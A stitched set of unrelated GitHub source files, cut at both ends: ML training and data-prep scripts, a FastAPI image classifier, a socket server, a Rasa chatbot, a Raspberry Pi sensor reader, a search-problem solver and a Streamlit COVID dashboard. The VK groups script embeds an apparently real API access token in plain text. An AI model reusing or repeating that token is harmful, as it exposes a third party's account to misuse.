pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(\n SceneData(txt_file=cfg.annotations.val,\n image_dir=cfg.data, \n mode='train', \n transform=image_transforms['val']),\n batch_size=cfg.batch_size, shuffle=False,\n num_workers=cfg.workers, pin_memory=True)\n\n # define loss function (criterion) and optimizer\n # criterion = nn.CrossEntropyLoss().cuda()\n criterion = FocalLoss(class_num=cfg.model.num_classes)\n\n optimizer = optim.SGD(model.parameters(), cfg.optimizer.learning_rate,\n momentum=cfg.optimizer.momentum,\n weight_decay=cfg.optimizer.weight_decay)\n\n\n model = torch.nn.DataParallel(model, device_ids=cfg.device_ids).cuda()\n # model = model.cuda()\n\n if cfg.evaluate:\n validate(val_loader, model, criterion)\n return\n\n for epoch in range(cfg.start_epoch, cfg.total_epochs):\n # train for one epoch\n train(train_loader, model, criterion, optimizer, epoch)\n\n # evaluate on validation set\n prec1 = validate(val_loader, model, criterion)\n\n # remember best prec@1 and save checkpoint\n is_best = prec1[0] > best_prec1\n best_prec1 = max(prec1[0], best_prec1)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'arch': cfg.model.arch,\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n }, epoch, is_best, cfg.work_dir)\n\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n \n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to 
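train mode\n    model.train()\n\n    # mixup() is project code (utils.utils); judging from the call below it\n    # returns (mixed_images, labels_a, labels_b, lam). A rough NumPy sketch\n    # of that behaviour, for reference only:\n    #   lam = np.random.beta(1.0, 1.0)\n    #   idx = np.random.permutation(len(images))\n    #   return lam * images + (1 - lam) * images[idx], labels, labels[idx], lam\n\n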
    end = time.time()\n    for i, (inputs, targets) in enumerate(train_loader):\n        adjust_learning_rate(optimizer, cfg.optimizer.learning_rate, epoch)\n        # measure data loading time\n        data_time.update(time.time() - end)\n\n        # targets = targets.cuda()\n        # inputs = inputs.cuda()\n        # inputs_var = torch.autograd.Variable(inputs)\n        # targets_var = torch.autograd.Variable(targets)\n\n        # # compute output\n        # outputs = model(inputs_var)\n        # loss = criterion(outputs, targets_var)\n\n        # # measure accuracy and record loss\n        # prec1, prec5 = accuracy(outputs.data, targets, topk=(1, 5))\n\n        # mixup\n        mixed_images, labels_a, labels_b, seed = mixup(inputs.numpy(), targets.numpy())\n        inputs = torch.from_numpy(mixed_images).cuda()\n        labels_a, labels_b = torch.from_numpy(labels_a).cuda(), torch.from_numpy(labels_b).cuda()\n\n        outputs = model(inputs)\n        loss = seed * criterion(outputs, labels_a) + (1-seed) * criterion(outputs, labels_b)\n\n        prec1_1, prec1_5 = accuracy(outputs.data, labels_a, topk=(1, 5))\n        prec2_1, prec2_5 = accuracy(outputs.data, labels_b, topk=(1, 5))\n        prec1 = seed * prec1_1 + (1 - seed) * prec2_1\n        prec5 = seed * prec1_5 + (1 - seed) * prec2_5\n\n        losses.update(loss.data.item(), inputs.size(0))\n        top1.update(prec1.item(), inputs.size(0))\n        top5.update(prec5.item(), inputs.size(0))\n\n        # compute gradient and do SGD step\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n\n        # measure elapsed time\n        batch_time.update(time.time() - end)\n        end = time.time()\n\n        if i % cfg.log_config.print_freq == 0:\n            print('Epoch: [{0}][{1}/{2}]\\t'\n                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n                  'Learning Rate {learning_rate:.4f}\\t'\n                  'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n                  'Acc@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n                  'Acc@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n                      epoch, i, len(train_loader), batch_time=batch_time,\n                      learning_rate=optimizer.param_groups[0]['lr'], loss=losses, top1=top1, top5=top5))\n\n\ndef validate(val_loader, model, criterion):\n    with torch.no_grad():\n        batch_time = AverageMeter()\n        losses = AverageMeter()\n        top1 = AverageMeter()\n        top5 = AverageMeter()\n\n        # switch to evaluate mode\n        model.eval()\n\n        end = time.time()\n        for i, (inputs, targets) in enumerate(val_loader):\n            targets = targets.cuda()\n            inputs = inputs.cuda()\n\n            # compute output\n            outputs = model(inputs)\n            loss = criterion(outputs, targets)\n\n            # measure accuracy and record loss\n            prec1, prec5 = accuracy(outputs.data, targets.data, topk=(1, 5))\n            losses.update(loss.data.item(), inputs.size(0))\n            top1.update(prec1.item(), inputs.size(0))\n            top5.update(prec5.item(), inputs.size(0))\n\n            # measure elapsed time\n            batch_time.update(time.time() - end)\n            end = time.time()\n\n            if i % cfg.log_config.print_freq == 0:\n                print('Test: [{0}/{1}]\\t'\n                      'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n                      'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n                      'Acc@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n                      'Acc@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n                          i, len(val_loader), batch_time=batch_time, loss=losses,\n                          top1=top1, top5=top5))\n\n        print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'\n              .format(top1=top1, top5=top5))\n\n        return top1.avg, top5.avg\n\n\ndef save_checkpoint(state, epoch, is_best, config, filename='checkpoint.pth.tar'):\n    try:\n        os.makedirs(config)\n    except:\n        pass\n    torch.save(state, os.path.join(config, 'epoch_{:03d}.pth.tar'.format(epoch)))\n    torch.save(state, os.path.join(config, filename))\n    if is_best:\n        shutil.copyfile(os.path.join(config, filename), os.path.join(config, 
+{"seq_id":"3502017692","text":"from fastapi import FastAPI, File, UploadFile\nfrom keras.models import load_model\nfrom keras.applications.vgg19 import preprocess_input\nimport numpy as np\nfrom PIL import Image\nimport io\nfrom pathlib import Path\n\n# Specify the path to your model file\nmodel_path = Path(\"model_vgg19.h5\")\n\n# Load the pre-trained model\nmodel = load_model(model_path)\n\n# Create a FastAPI app\napp = FastAPI()\n\n@app.post(\"/predict/\")\nasync def predict_image(file: UploadFile):\n    try:\n        # Check if the file is an image\n        if file.content_type.startswith('image'):\n            # Read and preprocess the image\n            img = Image.open(io.BytesIO(await file.read()))\n            img = img.resize((224, 224))\n            x = np.array(img)\n            x = np.expand_dims(x, axis=0)\n            img_data = preprocess_input(x)\n\n            # Make predictions\n            classes = model.predict(img_data)\n            malignant = classes[0, 0]\n            normal = classes[0, 1]\n\n            # Determine the result\n            if malignant > normal:\n                prediction = 'malignant'\n            else:\n                prediction = 'normal'\n\n            return {\"prediction\": prediction}\n        else:\n            return {\"error\": \"Invalid file format, please provide an image.\"}\n    except Exception:\n        return {\"error\": \"Internal server error\"}\n\nif __name__ == \"__main__\":\n    import os\n    import uvicorn\n\n    # Dynamically configure the port using the PORT environment variable\n    port = int(os.environ.get(\"PORT\", 8000))\n    uvicorn.run(app, host=\"0.0.0.0\", port=port)\n","repo_name":"AdeebCanCode/CancerAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7321408873","text":"import socket\r\nimport select\r\nimport threading\r\n\r\n\r\nclients = []\r\n\r\n\r\ndef handle_client(client_socket):\r\n    data = client_socket.recv(1024)\r\n    data = data.decode()\r\n    print(data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    server_socket.bind(('localhost', 6969))\r\n    server_socket.listen(5)\r\n    read_list = [server_socket]\r\n    ready, blank1, blank2 = select.select(read_list, [], [])\r\n    for sock in ready:\r\n        if sock is server_socket:\r\n            # if the socket we are currently checking is the rendezvous socket,\r\n            # we accept the incoming connection, append it to the ready list, and\r\n            # store the client socket\r\n            c_socket, c_address = sock.accept()\r\n            ready.append(c_socket)\r\n            clients.append(c_socket)\r\n        else:\r\n            try:\r\n                # here we create threads for all client sockets we have stored\r\n                client_thread = threading.Thread(target=handle_client, args=(sock,))\r\n                client_thread.start()\r\n                clients.remove(sock)\r\n            except socket.error as err:\r\n                print(err)\r\n","repo_name":"911-LucianGabriel-Bratu/ComputerNetworks2022_2023","sub_path":"SimpleSelect/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
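The select-based server above polls select.select only once and mutates the returned ready list while iterating over it, so it handles at most one batch of events before the script falls off the end. A sketch of the same one-message-per-client design with the polling moved into a loop — an assumed restructuring for illustration, not the original author's code:

import select
import socket
import threading

def serve_forever(server_socket, handle_client):
    read_list = [server_socket]
    while True:
        # re-poll the full socket list on every iteration
        ready, _, _ = select.select(read_list, [], [])
        for sock in ready:
            if sock is server_socket:
                c_socket, c_address = sock.accept()
                read_list.append(c_socket)
            else:
                # hand the client socket off to a worker thread and stop polling it
                threading.Thread(target=handle_client, args=(sock,)).start()
                read_list.remove(sock)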
+{"seq_id":"29785125433","text":"# Example file for working with conditional statements\n\ndef main():\n    x, y = 10, 100\n    \n    if (x < y):\n        st = \"x is less than y\"\n    elif (x == y):\n        st = \"x is equal to y\"\n    else:\n        st = \"x is greater than y\"\n    \n    print (st)\n    \n    st = \"x is less than y\" if (x < y) else \"x is greater than or the same as y\"\n    \n    print (st)\nif __name__== \"__main__\":\n    main()","repo_name":"Jevgenyij/Python2020","sub_path":"Conditionals_start.py","file_name":"Conditionals_start.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35646678560","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nimport bs4\nfrom rasa_core_sdk import Action\n#import register, step1, step2, step3\n\nimport sys\nsys.path.append('C:\\\\Users\\kxf\\Desktop\\Chatbot&Wealthbot')\nimport WealthbotConnection as wcon\nimport main2\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nclass ActionWealthbot2(Action):\n    def name(self):\n        return \"action_wealthbot2\"\n    \n    def run(self, dispatcher, tracker, domain): \n        annual_income = tracker.get_slot('income')\n        income_tax = tracker.get_slot('tax')\n        employemt_type = tracker.get_slot('employ')\n        liquid_net_worth = tracker.get_slot('networth')\n        finanical_goal = tracker.get_slot('goal')\n        expected_returns = tracker.get_slot('returns')\n        would = tracker.get_slot('would')\n        need = tracker.get_slot('need')\n\n        text = main2.main(annual_income=annual_income, income_tax=income_tax, liquid_net_worth=liquid_net_worth, employment_type=employemt_type,\n                          financial_goal=finanical_goal, expected_returns=expected_returns, would=would, need=need, acount_money='1,111,111.00')\n        soup = BeautifulSoup(text, 'html.parser')\n        \n        portfolio = ['your portfolio:']\n        for tbody in soup.find('tbody'):\n            if isinstance(tbody, bs4.element.Tag):\n                tds = tbody('td')\n                portfolio.append([tds[0].string, tds[1].string, tds[2].string])\n        #portfolio.append('\\n')\n        dispatcher.utter_message(str(portfolio))\n        \n\nclass ActionWealthbot1(Action):\n    def name(self):\n        return \"action_wealthbot1\"\n    \n    def run(self, dispatcher, tracker, domain):\n        email = tracker.get_slot('email')\n        password = tracker.get_slot('password')\n        response = wcon.login(email, password)\n        print(response.text)\n        soup = BeautifulSoup(response.text, 'html.parser')\n        \n        portfolio = ['your portfolio:']\n        for tbody in soup.find(\"tbody\"):\n            if isinstance(tbody, bs4.element.Tag):\n                tds = tbody(\"td\")\n                portfolio.append([tds[0].string, tds[1].string, tds[2].string])\n        portfolio.append(['\\n'])\n        dispatcher.utter_message(str(portfolio))\n    \nclass ActionStockinfo(Action):\n    def name(self):\n        return \"action_stockinfo\"\n    \n    def run(self, dispatcher, tracker, domain):\n        stock = tracker.get_slot('stock')\n\n        # build the quote URL from the requested stock slot instead of a hard-coded code\n        url = 'https://gupiao.baidu.com/stock/' + stock + '.html'\n        response = requests.get(url)\n        response.encoding = 'utf-8'\n        \n        soup = BeautifulSoup(response.text, \"html.parser\")\n        info = soup.find('div', attrs={'class':'stock-bets'})\n        #stock = info.find_all(attrs={'class':'bets-content'})\n        key = info.find_all('dt')\n        value = info.find_all('dd')\n        infoDic = {}\n        for i in range(len(key)):\n            k = key[i].text\n            v = value[i].text\n            infoDic[k] = v\n        \n        dispatcher.utter_message(str(infoDic))\n","repo_name":"chordou/chatbot-based-on-Rasa","sub_path":"Chatbot&Wealthbot/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"26591293813","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport nengo\nimport nengo_ocl\nimport os, inspect, sys\nimport socket\n\nocl = True  # use openCL\nnengo_gui_on = __name__ == '__builtin__'\n\n\n# set path based on gui\nif nengo_gui_on:\n    if sys.platform == 'darwin':\n        cur_path = '/Users/Jelmer/Work/EM/MEG_fan/models/nengo/assoc_recog'\n    elif socket.gethostname() == 'ai17864':\n        cur_path = '/home/p234584/assoc_recog'\n    else:\n        cur_path = '/share/volume0/jelmer/MEG_fan/models/nengo/assoc_recog'\nelse:\n    cur_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))  # script path\n\n\n\n# open cl settings\nif sys.platform == 'darwin':\n    os.environ[\"PYOPENCL_CTX\"] = \"0:1\"\nelif socket.gethostname() == 'ai17864':\n    print('ai comp')\nelse:\n    os.environ[\"PYOPENCL_CTX\"] = \"0\"\n\n\n\n# define the model\nwith nengo.Network() as model:\n    stim = nengo.Node(np.sin)\n    a = nengo.Ensemble(100, 1)\n    b = nengo.Ensemble(100, 1)\n    nengo.Connection(stim, a)\n    nengo.Connection(a, b, function=lambda x: x**2)\n\n    probe_a = nengo.Probe(a, synapse=0.01)\n    probe_b = nengo.Probe(b, synapse=0.01)\n\n# build and run the model\nwith nengo_ocl.Simulator(model) as sim:\n#with nengo.Simulator(model) as sim:\n    sim.run(10)\n\n# plot the results\nplt.plot(sim.trange(), sim.data[probe_a])\nplt.plot(sim.trange(), sim.data[probe_b])\nplt.show()\n","repo_name":"tcstewar/assoc_recog","sub_path":"opencl_test.py","file_name":"opencl_test.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"27706955174","text":"import json\nimport pathlib\nimport wandb\n\nimport pandas as pd\nfrom pymongo import MongoClient\nimport configparser\nfrom sklearn.model_selection import train_test_split\n\n\nclass TrainingDataPrep:\n    config = configparser.ConfigParser()\n\n    def __init__(self):\n        self.config.read(pathlib.Path(__file__).parent.parent / \"config\" / \"config.ini\")\n        # Open connection to mongoDB\n        self.conn = MongoClient(self.config[\"mongoDB\"][\"host\"])\n        self.db = self.conn[self.config[\"mongoDB\"][\"db\"]]\n\n    def build_training_df(self):\n        df_rating = pd.DataFrame(list(self.db[\"rating\"].find()))\n        df_watch = pd.DataFrame(list(self.db[\"watch_history\"].find()))\n        df_movie = pd.DataFrame(list(self.db[\"movie\"].find()))\n        df_user = pd.DataFrame(list(self.db[\"user\"].find()))\n        df_user = df_user[[\"user_id\", \"gender\"]]\n\n        df_movie = df_movie[\n            [\n                \"movie_id\",\n                \"genres\",\n                \"popularity\",\n                \"runtime\",\n                \"vote_average\",\n                \"vote_count\",\n            ]\n        ]\n        df = df_watch.merge(df_rating, how=\"left\", on=[\"user_id\", \"movie_id\"])\n        df = df.merge(df_movie, how=\"inner\", on=[\"movie_id\"])\n        df = df.merge(df_user, how=\"inner\", on=[\"user_id\"])\n\n        # Extract genres\n        df[\"genres\"] = df[\"genres\"].apply(lambda x: [ob[\"name\"] for ob in x])\n\n        # Extract watch time percentage\n        df[\"clips\"] = df[\"clips\"].apply(lambda x: len(x))\n        df[\"watch_percentage\"] = df[\"clips\"] / df[\"runtime\"]\n\n        # Add movie integer id\n        movies = df[\"movie_id\"].unique()\n        convert = {movie_id: i for i, movie_id in enumerate(movies)}\n        df[\"movie_id_int\"] = df[\"movie_id\"].apply(lambda x: convert[x])\n\n        df = df.drop([\"clips\", \"runtime\", \"_id_x\", \"_id_y\", \"timestamp\"], axis=1)\n        return df\n\n    def clean_training_data(self, df):\n        df[\"rate\"] = df[\"rate\"].fillna(0)\n        print(f'Number of unique users {len(df[\"user_id\"].unique())}')\n        print(f'Number of unique movies {len(df[\"movie_id\"].unique())}')\n        return df\n\n    def pickle_training_data(self, df, use_wandb=True):\n        df_train, df_test = train_test_split(df, test_size=0.1, random_state=1)\n        # split the remaining training rows, not the full frame, so the\n        # validation set stays disjoint from the test set\n        df_train, df_val = train_test_split(df_train, test_size=0.2, random_state=1)\n        df_train.to_pickle(self.config[\"TrainData\"][\"train_df_pkl_path\"])\n        df_val.to_pickle(self.config[\"TrainData\"][\"val_df_pkl_path\"])\n        df_test.to_pickle(self.config[\"TrainData\"][\"test_df_pkl_path\"])\n\n        if use_wandb:\n            run = wandb.init(\n                project=\"movie-recs\",\n                entity=\"movie-recs-team3\",\n                job_type=\"data-preparation\",\n            )\n\n            artifact = wandb.Artifact(\"data-df\", type=\"data\")\n            artifact.add_file(self.config[\"TrainData\"][\"train_df_pkl_path\"])\n            artifact.add_file(self.config[\"TrainData\"][\"val_df_pkl_path\"])\n            artifact.add_file(self.config[\"TrainData\"][\"test_df_pkl_path\"])\n            run.log_artifact(artifact)\n            run.finish()\n\n    def unpickle_training_data(self, path):\n        return pd.read_pickle(path)\n\n    def run(self):\n        df = self.build_training_df()\n        df = self.clean_training_data(df)\n        self.pickle_training_data(df)\n\n\nif __name__ == \"__main__\":\n    trainingData = TrainingDataPrep()\n    df = trainingData.build_training_df()\n    df = trainingData.clean_training_data(df)\n","repo_name":"Luca-garnier/Movie-Recommendation-System","sub_path":"data/train_data_prep.py","file_name":"train_data_prep.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
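In pickle_training_data above, splitting the full frame twice would have let test rows reappear in the validation set; chaining the second split off df_train (as in the record) keeps the three sets disjoint. A small self-contained check of the resulting proportions, using a toy frame with the script's 0.1/0.2 fractions (roughly a 72/18/10 split):

import pandas as pd
from sklearn.model_selection import train_test_split

df = pd.DataFrame({"x": range(100)})
df_train, df_test = train_test_split(df, test_size=0.1, random_state=1)
df_train, df_val = train_test_split(df_train, test_size=0.2, random_state=1)
print(len(df_train), len(df_val), len(df_test))    # 72 18 10
assert not set(df_val.index) & set(df_test.index)  # no overlap between val and test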
+{"seq_id":"74882927473","text":"import logging\n\nimport pytest\n\nimport roleml\n\n\ndef test_old_game_pro(pro_game, caplog):\n    with caplog.at_level(logging.WARNING):\n        roleml.predict(pro_game[\"game\"], pro_game[\"game\"][\"timeline\"])\n\n    assert caplog.text\n\n\ndef test_recent_game(clean_game_na):\n    with pytest.warns(None) as record:\n        roleml.predict(clean_game_na[\"game\"], clean_game_na[\"game\"][\"timeline\"])\n\n    assert not record\n","repo_name":"Canisback/roleML","sub_path":"tests/test_old_game.py","file_name":"test_old_game.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"39"} +{"seq_id":"11673963464","text":"from pprint import pprint\r\nimport requests\r\nimport time\r\nimport json\r\n\r\nAPP_ID = 6988731\r\n\r\nTOKEN = '73eaea320bdc0d3299faa475c196cfea1c4df9da4c6d291633f9fe8f83c08c4de2a3abf89fbc3ed8a44e1'\r\n\r\nuser_input = input()\r\ngroups_list = []\r\n\r\n\r\nclass User:\r\n    def __init__(self, token):\r\n        self.token = token\r\n\r\n    def get_params(self):\r\n        params = dict(\r\n            access_token=self.token,\r\n            v='5.95',\r\n            extended=1,\r\n            count=1000,\r\n            fields=['members_count']\r\n        )\r\n        # input() always returns a string, so test the content rather than the type\r\n        if user_input.isdigit():\r\n            params['user_id'] = user_input\r\n        else:\r\n            params['screen_name'] = user_input\r\n        return params\r\n\r\n    def get_users_groups(self):\r\n        params = self.get_params()\r\n        response = requests.get(\r\n            'https://api.vk.com/method/groups.get',\r\n            params\r\n        )\r\n        response_json = response.json()['response']['items']\r\n        print('-')\r\n        return response_json\r\n\r\n    def get_unique_groups(self):\r\n        users_groups = self.get_users_groups()\r\n        for group in users_groups:\r\n            group_dict = {\r\n                'name': group['name'],\r\n                'gid': group['id'],\r\n                'members_count': group['members_count']\r\n            }\r\n            params = dict(\r\n                access_token=self.token,\r\n                v='5.95',\r\n                group_id=group['id'],\r\n                count=1000,\r\n                filter='friends'\r\n            )\r\n            try:\r\n                response = requests.get(\r\n                    'https://api.vk.com/method/groups.getMembers',\r\n                    params\r\n                )\r\n            except requests.exceptions.RequestException:\r\n                time.sleep(3)\r\n            else:\r\n                response_json = response.json()\r\n                if response_json['response']['count'] == 0:\r\n                    groups_list.append(group_dict)\r\n            finally:\r\n                print('-')\r\n\r\n        with open('groups.json', 'w') as file:\r\n            json.dump(groups_list, file, ensure_ascii=False, indent=2)\r\n\r\n        with open('groups.json') as file:\r\n            groups_json = json.load(file)\r\n        pprint(groups_json)\r\n\r\n\r\nif __name__ == '__main__':\r\n    user1 = User(TOKEN)\r\n    user1.get_unique_groups()\r\n","repo_name":"obiwankenolya/py-diploma-baltsatu","sub_path":"py-diploma2.0.py","file_name":"py-diploma2.0.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19117962806","text":"\"\"\"\nSolution stub for the River Problem.\n\nFill in the implementation of the `River_problem` class to match the\nrepresentation that you specified in problem XYZ.\n\"\"\"\nfrom searchProblem import Search_problem, Arc\n\n\n\nclass River_Node():\n    \"\"\" This class defines the state representation as per the problem. 
\n \n Attributes:\n L = Left Side of River\n R = Right Side of River\n \"\"\"\n\n def __eq__(self, other):\n if self.L == other.L and self.R == other.R:\n return True\n\n return False\n\n def __str__(self):\n \"\"\" Generates the human readable representation of Node(Left,Right) of the class.\"\"\"\n return \"Node(L = {0}, R = {1})\".format(str(self.L), str(self.R))\n\n def __init__(self, L, R):\n \"\"\" Parameters should be a string of FCG.\n \n L = Left Side of River\n R = Right Side of River\n \"\"\"\n self.L = set(L)\n self.R = set(R)\n\nclass River_problem(Search_problem):\n def start_node(self):\n \"\"\"returns start node\"\"\"\n x = River_Node(\"FHGR\",\"\")\n return x\n \n def is_goal(self,node):\n \"\"\"is True if node is a goal\"\"\"\n \n return (set(\"FHGR\") == node.R)\n\n def neighbors(self,node):\n \"\"\"returns a list of the arcs for the neighbors of node\"\"\"\n \n valid_arcs = []\n temp_set = set(\"R\")\n\n # Build valid_arcs list and return.\n\n if \"R\" in node.L:\n \n # Add the option of just moving the cart if it creates a valid state.\n temp_node = River_Node(node.L - temp_set, node.R.union(temp_set))\n if self.is_valid_node(temp_node):\n valid_arcs.append(Arc(node, temp_node, 1, \"MOVE RAFT TO RIGHT\"))\n\n # For each \n for item in (node.L - set(\"R\")):\n new_temp_set = temp_set.union(set(item))\n new_temp_node = River_Node(node.L - new_temp_set, node.R.union(new_temp_set))\n\n if self.is_valid_node(new_temp_node):\n valid_arcs.append(Arc(node, new_temp_node, 1, \"PICKUP {0} AND MOVE TO RIGHT\".format(item)))\n\n if \"R\" in node.R:\n\n temp_node = River_Node(node.L.union(temp_set), node.R - temp_set)\n if self.is_valid_node(temp_node):\n valid_arcs.append(Arc(node, temp_node, 1, \"MOVE RAFT TO LEFT\"))\n\n for item in (node.R - set(\"R\")):\n new_temp_set = temp_set.union(set(item))\n new_temp_node = River_Node(node.L.union(new_temp_set), node.R - new_temp_set)\n \n if self.is_valid_node(new_temp_node):\n valid_arcs.append(Arc(node, new_temp_node, 1, \"PICKUP {0} AND MOVE TO LEFT\".format(item)))\n\n return valid_arcs\n\n def heuristic(self,n):\n \"\"\"Gives the heuristic value of node n.\"\"\"\n return len(n.L)\n\n def is_valid_node(self,n):\n \"\"\"Checks if a node is a valid node according to problem\"\"\"\n\n # raft = set(\"R\")\n # invalid_HG = set(\"HG\")\n # invalid_FH = set(\"FH\")\n # These python sets don't really work as what I expected them to....\n\n # Check Left\n if \"H\" in n.L and \"G\" in n.L and \"R\" not in n.L: # ie. The Hen and Grain cannot be left without the farmer (raft)\n return False \n if \"F\" in n.L and \"H\" in n.L and \"R\" not in n.L: # ie. The Fox and Hen cannot be left without the farmer (raft)\n return False \n \n # Check Right\n if \"H\" in n.R and \"G\" in n.R and \"R\" not in n.R: # ie. The Hen and Grain cannot be left without the farmer (raft)\n return False \n if \"F\" in n.R and \"H\" in n.R and \"R\" not in n.R: # ie. 
The Fox and Hen cannot be left without the farmer (raft)\n return False \n\n return True # If both sides of the river are valid then the Node as whole is valid.\n\nif __name__ == \"__main__\":\n\n x = River_problem()\n\n for item in x.neighbors(River_Node(\"FG\", \"RH\")):\n print(item)\n\n print()\n\n","repo_name":"shouyang/CMPUT-366","sub_path":"cmput_366_a1/19f-cmput366-assignment1/_pythonCode/riverProblem.py","file_name":"riverProblem.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37218120072","text":"#!/usr/local/bin/python\n\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\npin_to_circuit = 7\n\ndef rc_time ():\n count = 0\n \n GPIO.setup(7, GPIO.OUT)\n GPIO.output(7, GPIO.LOW)\n time.sleep(0.1)\n\n GPIO.setup(7, GPIO.IN)\n init_time = time.time() \n \n while (GPIO.input(7) == GPIO.LOW):\n count += 1\n if(time.time() - init_time >= 0.05):\n return count/1e3 \n return count/1e3\n\ndef main():\n try:\n while True:\n print(rc_time())\n except KeyboardInterrupt:\n pass\n finally:\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n main()","repo_name":"rhitayu2/solar-cell-maintenance","sub_path":"ldr.py","file_name":"ldr.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42986623325","text":"import requests\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport csv\r\n\r\n\r\n@st.cache\r\ndef load_data(url):\r\n try:\r\n res = requests.get(url)\r\n return res, True\r\n except:\r\n return -1, False\r\n\r\n\r\ndef daily_cases(df):\r\n st.header(\"Today's Stats\")\r\n col1, col2, col3 = st.columns(3)\r\n col1.metric(\"Confirmed\", int(df['Daily Confirmed'][-1]),\r\n (int(df['Daily Confirmed'][-1]) - int(df['Daily Confirmed'][-2])))\r\n col2.metric(\"Deceased\", int(df['Daily Deceased'][-1]),\r\n (int(df['Daily Deceased'][-1]) - int(df['Daily Deceased'][-2])))\r\n col3.metric(\"Recovered\", int(df['Daily Recovered'][-1]),\r\n (int(df['Daily Recovered'][-1]) - int(df['Daily Recovered'][-2])))\r\n\r\n st.header(\"Daily confirmed cases -:\")\r\n st.line_chart(df['Daily Confirmed'].rolling(7).mean())\r\n\r\n st.header(\"Daily Deceased cases -:\")\r\n st.line_chart(df['Daily Deceased'].rolling(7).mean())\r\n\r\n st.header(\"Daily Recovered cases -:\")\r\n st.line_chart(df['Daily Recovered'].rolling(7).mean())\r\n\r\n\r\ndef total_cases(df):\r\n st.header(\"Total Stats\")\r\n col1, col2, col3 = st.columns(3)\r\n col1.metric(\"Confirmed\", int(df['Total Confirmed'][-1]))\r\n col2.metric(\"Deceased\", int(df['Total Deceased'][-1]))\r\n col3.metric(\"Recovered\", int(df['Total Recovered'][-1]))\r\n\r\n st.header(\"Total confirmed cases -:\")\r\n st.bar_chart(df['Total Confirmed'].rolling(7).mean())\r\n\r\n st.header(\"Total Deceased cases -:\")\r\n st.bar_chart(df['Total Deceased'].rolling(7).mean())\r\n\r\n st.header(\"Total Recovered cases -:\")\r\n st.bar_chart(df['Total Recovered'].rolling(7).mean())\r\n\r\n\r\ndef plot_data():\r\n df1 = pd.DataFrame(data)\r\n df = df1.copy()\r\n # -------------------- Data cleaning ----------------\r\n df.columns = df.iloc[0]\r\n df.drop(df.index[0], inplace=True)\r\n\r\n df['Date'] = pd.to_datetime(df['Date'])\r\n df['Date_YMD'] = pd.to_datetime(df['Date_YMD'])\r\n df['Daily Confirmed'] = pd.to_numeric(df['Daily Confirmed'])\r\n df['Total Confirmed'] = pd.to_numeric(df['Total Confirmed'])\r\n df['Daily Recovered'] = 
pd.to_numeric(df['Daily Recovered'])\r\n    df['Total Recovered'] = pd.to_numeric(df['Total Recovered'])\r\n    df['Daily Deceased'] = pd.to_numeric(df['Daily Deceased'])\r\n    df['Total Deceased'] = pd.to_numeric(df['Total Deceased'])\r\n\r\n    df.index = df['Date']\r\n    # --------------------------------------------------------\r\n\r\n    # ------------------- side bar ---------------------------\r\n    st.sidebar.title(\"Covid-19 in India\")\r\n    show_data = st.sidebar.checkbox(\"ShowData\")\r\n    if show_data:\r\n        st.subheader(\"Dataset\")\r\n        st.write(df)\r\n\r\n    select_cases = st.sidebar.selectbox(\"Select cases\", ['Daily', 'Total'])\r\n    if select_cases == \"Daily\":\r\n        daily_cases(df)\r\n    if select_cases == \"Total\":\r\n        total_cases(df)\r\n\r\n\r\n# ----------------------- Main code --------------------------------\r\nurl = 'https://data.covid19india.org/csv/latest/case_time_series.csv'\r\nurl2 = 'https://data.covid19india.org/v4/min/data.min.json'\r\nst.title(\"Covid cases in India\")\r\nst.write(\"Fetching data...\")\r\nres, success = load_data(url)\r\nif success:\r\n    # only parse the CSV once the download has actually succeeded\r\n    data = 